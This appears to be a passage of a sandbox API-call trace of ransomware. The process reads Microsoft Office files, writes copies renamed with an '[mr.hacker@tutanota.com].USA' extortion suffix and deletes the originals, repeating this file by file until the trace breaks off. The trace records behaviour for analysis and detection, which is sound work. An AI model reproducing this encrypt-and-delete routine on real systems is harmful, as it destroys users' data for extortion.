lstrlenW (lpString=".ppt") returned 4 [0272.167] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0272.167] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCVDTUI.DLL") returned 60 [0272.167] lstrlenW (lpString=".zip") returned 4 [0272.167] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0272.167] lstrlenW (lpString=".rar") returned 4 [0272.167] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0272.167] lstrlenW (lpString=".bz2") returned 4 [0272.167] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0272.167] lstrlenW (lpString=".7z") returned 3 [0272.167] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0272.167] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCVDTUI.DLL") returned 60 [0272.167] lstrlenW (lpString=".dbf") returned 4 [0272.167] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0272.167] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCVDTUI.DLL") returned 60 [0272.167] lstrlenW (lpString=".1cd") returned 4 [0272.167] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0272.167] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCVDTUI.DLL") returned 60 [0272.167] lstrlenW (lpString=".jpg") returned 4 [0272.167] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0272.168] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCVDTUI.DLL") returned 60 [0272.168] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCVDTUI.DLL") returned 60 [0272.168] lstrlenW (lpString=".doc") returned 4 [0272.168] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0272.168] lstrlenW (lpString=".docx") returned 5 [0272.168] lstrcmpiW (lpString1=".docx", lpString2="I.DLL") returned -1 [0272.168] lstrlenW (lpString=".pdf") returned 4 [0272.168] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0272.168] lstrlenW (lpString=".xls") returned 4 [0272.168] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0272.168] lstrlenW (lpString=".xlsx") returned 5 [0272.168] lstrcmpiW (lpString1=".xlsx", lpString2="I.DLL") returned -1 [0272.168] lstrlenW (lpString=".ppt") returned 4 [0272.168] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0272.168] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCVDTUI.DLL") returned 60 [0272.168] lstrlenW (lpString=".zip") returned 4 [0272.168] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0272.168] lstrlenW (lpString=".rar") returned 4 [0272.168] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0272.168] lstrlenW (lpString=".bz2") returned 4 [0272.168] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0272.168] lstrlenW (lpString=".7z") returned 3 [0272.168] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0272.168] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCVDTUI.DLL") returned 60 [0272.168] lstrlenW (lpString=".dbf") returned 4 [0272.168] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0272.168] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCVDTUI.DLL") returned 60 [0272.168] lstrlenW (lpString=".1cd") returned 4 [0272.168] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0272.168] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCVDTUI.DLL") returned 60 [0272.168] lstrlenW (lpString=".jpg") returned 4 [0272.168] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0272.169] lstrcmpiW (lpString1=".VSL", lpString2=".USA") returned 1 [0272.169] lstrlenW (lpString="AECUTILS.VSL") returned 12 [0272.169] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\AECUTILS.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\aecutils.vsl"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0272.170] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x394ff1c | out: lpFileSize=0x394ff1c*=41864) returned 1 [0272.170] CloseHandle (hObject=0x3ac) returned 1 [0272.170] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\AECUTILS.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\aecutils.vsl")) returned 0x20 [0272.170] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\AECUTILS.VSL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\aecutils.vsl.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0272.170] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\AECUTILS.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\aecutils.vsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0272.170] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x394fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.170] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x394fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.170] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\AECUTILS.VSL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\aecutils.vsl.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0272.170] GetLastError () returned 0x0 [0272.170] ReadFile (in: hFile=0x3ac, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x394fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x394fed4*=0xa388, lpOverlapped=0x0) returned 1 [0272.172] WriteFile (in: hFile=0x328, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0xa390, lpNumberOfBytesWritten=0x394fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x394fc9c*=0xa390, lpOverlapped=0x0) returned 1 [0272.173] ReadFile (in: hFile=0x3ac, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x394fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x394fed4*=0x0, lpOverlapped=0x0) returned 1 [0272.174] WriteFile (in: hFile=0x328, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x394fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x394fc9c*=0xec, lpOverlapped=0x0) returned 1 [0272.174] SetEndOfFile (hFile=0x328) returned 1 [0272.174] CloseHandle (hObject=0x328) returned 1 [0272.174] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x394fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.174] SetEndOfFile (hFile=0x3ac) returned 1 [0272.178] CloseHandle (hObject=0x3ac) returned 1 [0272.178] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\AECUTILS.VSL.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0272.178] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\AECUTILS.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\aecutils.vsl")) returned 1 [0272.178] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\AECUTILS.VSL") returned 60 [0272.178] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\AECUTILS.VSL") returned 60 [0272.178] lstrlenW (lpString=".doc") returned 4 [0272.178] lstrcmpiW (lpString1=".doc", lpString2=".VSL") returned -1 [0272.178] lstrlenW (lpString=".docx") returned 5 [0272.178] lstrcmpiW (lpString1=".docx", lpString2="S.VSL") returned -1 [0272.178] lstrlenW (lpString=".pdf") returned 4 [0272.178] lstrcmpiW (lpString1=".pdf", lpString2=".VSL") returned -1 [0272.178] lstrlenW (lpString=".xls") returned 4 [0272.178] lstrcmpiW (lpString1=".xls", lpString2=".VSL") returned 1 [0272.178] lstrlenW (lpString=".xlsx") returned 5 [0272.179] lstrcmpiW (lpString1=".xlsx", lpString2="S.VSL") returned -1 [0272.179] lstrlenW (lpString=".ppt") returned 4 [0272.179] lstrcmpiW (lpString1=".ppt", lpString2=".VSL") returned -1 [0272.179] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\AECUTILS.VSL") returned 60 [0272.179] lstrlenW (lpString=".zip") returned 4 [0272.179] lstrcmpiW (lpString1=".zip", lpString2=".VSL") returned 1 [0272.179] lstrlenW (lpString=".rar") returned 4 [0272.179] lstrcmpiW (lpString1=".rar", lpString2=".VSL") returned -1 [0272.179] lstrlenW (lpString=".bz2") returned 4 [0272.179] lstrcmpiW (lpString1=".bz2", lpString2=".VSL") returned -1 [0272.179] lstrlenW (lpString=".7z") returned 3 [0272.179] lstrcmpiW (lpString1=".7z", lpString2="VSL") returned -1 [0272.179] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\AECUTILS.VSL") returned 60 [0272.179] lstrlenW (lpString=".dbf") returned 4 [0272.179] lstrcmpiW (lpString1=".dbf", lpString2=".VSL") returned -1 [0272.179] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\AECUTILS.VSL") returned 60 [0272.179] lstrlenW (lpString=".1cd") returned 4 [0272.179] lstrcmpiW (lpString1=".1cd", lpString2=".VSL") returned -1 [0272.179] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\AECUTILS.VSL") returned 60 [0272.179] lstrlenW (lpString=".jpg") returned 4 [0272.179] lstrcmpiW (lpString1=".jpg", lpString2=".VSL") returned -1 [0272.179] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\AECUTILS.VSL") returned 60 [0272.179] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\AECUTILS.VSL") returned 60 [0272.179] lstrlenW (lpString=".doc") returned 4 [0272.179] lstrcmpiW (lpString1=".doc", lpString2=".VSL") returned -1 [0272.179] lstrlenW (lpString=".docx") returned 5 [0272.179] lstrcmpiW (lpString1=".docx", lpString2="S.VSL") returned -1 [0272.179] lstrlenW (lpString=".pdf") returned 4 [0272.179] lstrcmpiW (lpString1=".pdf", lpString2=".VSL") returned -1 [0272.180] lstrlenW (lpString=".xls") returned 4 [0272.180] lstrcmpiW (lpString1=".xls", lpString2=".VSL") returned 1 [0272.180] lstrlenW (lpString=".xlsx") returned 5 [0272.180] lstrcmpiW (lpString1=".xlsx", lpString2="S.VSL") returned -1 [0272.180] lstrlenW (lpString=".ppt") returned 4 [0272.180] lstrcmpiW (lpString1=".ppt", lpString2=".VSL") returned -1 [0272.180] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\AECUTILS.VSL") returned 60 [0272.180] lstrlenW (lpString=".zip") returned 4 [0272.180] lstrcmpiW (lpString1=".zip", lpString2=".VSL") returned 1 [0272.180] lstrlenW (lpString=".rar") returned 4 [0272.180] lstrcmpiW (lpString1=".rar", lpString2=".VSL") returned -1 [0272.180] lstrlenW (lpString=".bz2") returned 4 [0272.180] lstrcmpiW (lpString1=".bz2", lpString2=".VSL") returned -1 [0272.180] lstrlenW (lpString=".7z") returned 3 [0272.180] lstrcmpiW (lpString1=".7z", lpString2="VSL") returned -1 [0272.180] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\AECUTILS.VSL") returned 60 [0272.180] lstrlenW (lpString=".dbf") returned 4 [0272.180] lstrcmpiW (lpString1=".dbf", lpString2=".VSL") returned -1 [0272.180] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\AECUTILS.VSL") returned 60 [0272.180] lstrlenW (lpString=".1cd") returned 4 [0272.180] lstrcmpiW (lpString1=".1cd", lpString2=".VSL") returned -1 [0272.180] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\AECUTILS.VSL") returned 60 [0272.180] lstrlenW (lpString=".jpg") returned 4 [0272.180] lstrcmpiW (lpString1=".jpg", lpString2=".VSL") returned -1 [0272.180] lstrcmpiW (lpString1=".VRD", lpString2=".USA") returned 1 [0272.180] lstrlenW (lpString="ASSET.VRD") returned 9 [0272.181] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ASSET.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\asset.vrd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0272.181] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x394ff1c | out: lpFileSize=0x394ff1c*=1694) returned 1 [0272.181] CloseHandle (hObject=0x3ac) returned 1 [0272.181] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ASSET.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\asset.vrd")) returned 0x20 [0272.181] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ASSET.VRD.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\asset.vrd.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0272.181] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ASSET.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\asset.vrd"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0272.181] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x394fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.181] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x394fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.181] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ASSET.VRD.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\asset.vrd.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0272.182] GetLastError () returned 0x0 [0272.182] ReadFile (in: hFile=0x3ac, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x394fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x394fed4*=0x69e, lpOverlapped=0x0) returned 1 [0272.184] WriteFile (in: hFile=0x328, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0x6a0, lpNumberOfBytesWritten=0x394fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x394fc9c*=0x6a0, lpOverlapped=0x0) returned 1 [0272.184] ReadFile (in: hFile=0x3ac, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x394fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x394fed4*=0x0, lpOverlapped=0x0) returned 1 [0272.184] WriteFile (in: hFile=0x328, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x394fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x394fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0272.184] SetEndOfFile (hFile=0x328) returned 1 [0272.184] CloseHandle (hObject=0x328) returned 1 [0272.184] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x394fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.184] SetEndOfFile (hFile=0x3ac) returned 1 [0272.186] CloseHandle (hObject=0x3ac) returned 1 [0272.186] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ASSET.VRD.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0272.186] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ASSET.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\asset.vrd")) returned 1 [0272.187] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ASSET.VRD") returned 57 [0272.187] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ASSET.VRD") returned 57 [0272.187] lstrlenW (lpString=".doc") returned 4 [0272.187] lstrcmpiW (lpString1=".doc", lpString2=".VRD") returned -1 [0272.187] lstrlenW (lpString=".docx") returned 5 [0272.187] lstrcmpiW (lpString1=".docx", lpString2="T.VRD") returned -1 [0272.187] lstrlenW (lpString=".pdf") returned 4 [0272.187] lstrcmpiW (lpString1=".pdf", lpString2=".VRD") returned -1 [0272.187] lstrlenW (lpString=".xls") returned 4 [0272.187] lstrcmpiW (lpString1=".xls", lpString2=".VRD") returned 1 [0272.187] lstrlenW (lpString=".xlsx") returned 5 [0272.187] lstrcmpiW (lpString1=".xlsx", lpString2="T.VRD") returned -1 [0272.187] lstrlenW (lpString=".ppt") returned 4 [0272.187] lstrcmpiW (lpString1=".ppt", lpString2=".VRD") returned -1 [0272.187] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ASSET.VRD") returned 57 [0272.187] lstrlenW (lpString=".zip") returned 4 [0272.187] lstrcmpiW (lpString1=".zip", lpString2=".VRD") returned 1 [0272.187] lstrlenW (lpString=".rar") returned 4 [0272.187] lstrcmpiW (lpString1=".rar", lpString2=".VRD") returned -1 [0272.187] lstrlenW (lpString=".bz2") returned 4 [0272.187] lstrcmpiW (lpString1=".bz2", lpString2=".VRD") returned -1 [0272.187] lstrlenW (lpString=".7z") returned 3 [0272.187] lstrcmpiW (lpString1=".7z", lpString2="VRD") returned -1 [0272.187] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ASSET.VRD") returned 57 [0272.187] lstrlenW (lpString=".dbf") returned 4 [0272.187] lstrcmpiW (lpString1=".dbf", lpString2=".VRD") returned -1 [0272.187] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ASSET.VRD") returned 57 [0272.187] lstrlenW (lpString=".1cd") returned 4 [0272.187] lstrcmpiW (lpString1=".1cd", lpString2=".VRD") returned -1 [0272.188] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ASSET.VRD") returned 57 [0272.188] lstrlenW (lpString=".jpg") returned 4 [0272.188] lstrcmpiW (lpString1=".jpg", lpString2=".VRD") returned -1 [0272.188] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ASSET.VRD") returned 57 [0272.188] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ASSET.VRD") returned 57 [0272.188] lstrlenW (lpString=".doc") returned 4 [0272.188] lstrcmpiW (lpString1=".doc", lpString2=".VRD") returned -1 [0272.188] lstrlenW (lpString=".docx") returned 5 [0272.188] lstrcmpiW (lpString1=".docx", lpString2="T.VRD") returned -1 [0272.188] lstrlenW (lpString=".pdf") returned 4 [0272.188] lstrcmpiW (lpString1=".pdf", lpString2=".VRD") returned -1 [0272.188] lstrlenW (lpString=".xls") returned 4 [0272.188] lstrcmpiW (lpString1=".xls", lpString2=".VRD") returned 1 [0272.188] lstrlenW (lpString=".xlsx") returned 5 [0272.188] lstrcmpiW (lpString1=".xlsx", lpString2="T.VRD") returned -1 [0272.188] lstrlenW (lpString=".ppt") returned 4 [0272.188] lstrcmpiW (lpString1=".ppt", lpString2=".VRD") returned -1 [0272.188] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ASSET.VRD") returned 57 [0272.188] lstrlenW (lpString=".zip") returned 4 [0272.188] lstrcmpiW (lpString1=".zip", lpString2=".VRD") returned 1 [0272.188] lstrlenW (lpString=".rar") returned 4 [0272.188] lstrcmpiW (lpString1=".rar", lpString2=".VRD") returned -1 [0272.188] lstrlenW (lpString=".bz2") returned 4 [0272.188] lstrcmpiW (lpString1=".bz2", lpString2=".VRD") returned -1 [0272.188] lstrlenW (lpString=".7z") returned 3 [0272.188] lstrcmpiW (lpString1=".7z", lpString2="VRD") returned -1 [0272.188] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ASSET.VRD") returned 57 [0272.188] lstrlenW (lpString=".dbf") returned 4 [0272.188] lstrcmpiW (lpString1=".dbf", lpString2=".VRD") returned -1 [0272.188] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ASSET.VRD") returned 57 [0272.188] lstrlenW (lpString=".1cd") returned 4 [0272.189] lstrcmpiW (lpString1=".1cd", lpString2=".VRD") returned -1 [0272.189] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ASSET.VRD") returned 57 [0272.189] lstrlenW (lpString=".jpg") returned 4 [0272.189] lstrcmpiW (lpString1=".jpg", lpString2=".VRD") returned -1 [0272.189] lstrcmpiW (lpString1=".dll", lpString2=".USA") returned -1 [0272.189] lstrlenW (lpString="BCSRuntimeRes.dll") returned 17 [0272.189] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BCSRuntimeRes.dll" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\bcsruntimeres.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0272.190] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x394ff1c | out: lpFileSize=0x394ff1c*=24960) returned 1 [0272.190] CloseHandle (hObject=0x3ac) returned 1 [0272.190] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BCSRuntimeRes.dll" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\bcsruntimeres.dll")) returned 0x20 [0272.190] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BCSRuntimeRes.dll.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\bcsruntimeres.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0272.190] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BCSRuntimeRes.dll" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\bcsruntimeres.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0272.190] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BCSRuntimeRes.dll") returned 65 [0272.191] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BCSRuntimeRes.dll") returned 65 [0272.191] lstrlenW (lpString=".doc") returned 4 [0272.191] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0272.191] lstrlenW (lpString=".docx") returned 5 [0272.191] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0272.191] lstrlenW (lpString=".pdf") returned 4 [0272.191] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0272.191] lstrlenW (lpString=".xls") returned 4 [0272.191] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0272.191] lstrlenW (lpString=".xlsx") returned 5 [0272.191] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0272.191] lstrlenW (lpString=".ppt") returned 4 [0272.191] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0272.191] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BCSRuntimeRes.dll") returned 65 [0272.191] lstrlenW (lpString=".zip") returned 4 [0272.191] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0272.191] lstrlenW (lpString=".rar") returned 4 [0272.191] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0272.191] lstrlenW (lpString=".bz2") returned 4 [0272.191] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0272.191] lstrlenW (lpString=".7z") returned 3 [0272.191] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0272.191] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BCSRuntimeRes.dll") returned 65 [0272.192] lstrlenW (lpString=".dbf") returned 4 [0272.192] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0272.192] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BCSRuntimeRes.dll") returned 65 [0272.192] lstrlenW (lpString=".1cd") returned 4 [0272.192] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0272.192] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BCSRuntimeRes.dll") returned 65 [0272.192] lstrlenW (lpString=".jpg") returned 4 [0272.192] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0272.192] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BCSRuntimeRes.dll") returned 65 [0272.192] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BCSRuntimeRes.dll") returned 65 [0272.192] lstrlenW (lpString=".doc") returned 4 [0272.192] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0272.192] lstrlenW (lpString=".docx") returned 5 [0272.192] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0272.192] lstrlenW (lpString=".pdf") returned 4 [0272.192] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0272.192] lstrlenW (lpString=".xls") returned 4 [0272.192] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0272.192] lstrlenW (lpString=".xlsx") returned 5 [0272.192] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0272.192] lstrlenW (lpString=".ppt") returned 4 [0272.192] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0272.192] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BCSRuntimeRes.dll") returned 65 [0272.192] lstrlenW (lpString=".zip") returned 4 [0272.192] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0272.192] lstrlenW (lpString=".rar") returned 4 [0272.192] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0272.192] lstrlenW (lpString=".bz2") returned 4 [0272.192] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0272.192] lstrlenW (lpString=".7z") returned 3 [0272.193] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0272.193] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BCSRuntimeRes.dll") returned 65 [0272.193] lstrlenW (lpString=".dbf") returned 4 [0272.193] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0272.193] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BCSRuntimeRes.dll") returned 65 [0272.193] lstrlenW (lpString=".1cd") returned 4 [0272.193] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0272.193] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BCSRuntimeRes.dll") returned 65 [0272.193] lstrlenW (lpString=".jpg") returned 4 [0272.193] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0272.193] lstrcmpiW (lpString1=".DLL", lpString2=".USA") returned -1 [0272.193] lstrlenW (lpString="BHOINTL.DLL") returned 11 [0272.193] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BHOINTL.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\bhointl.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, 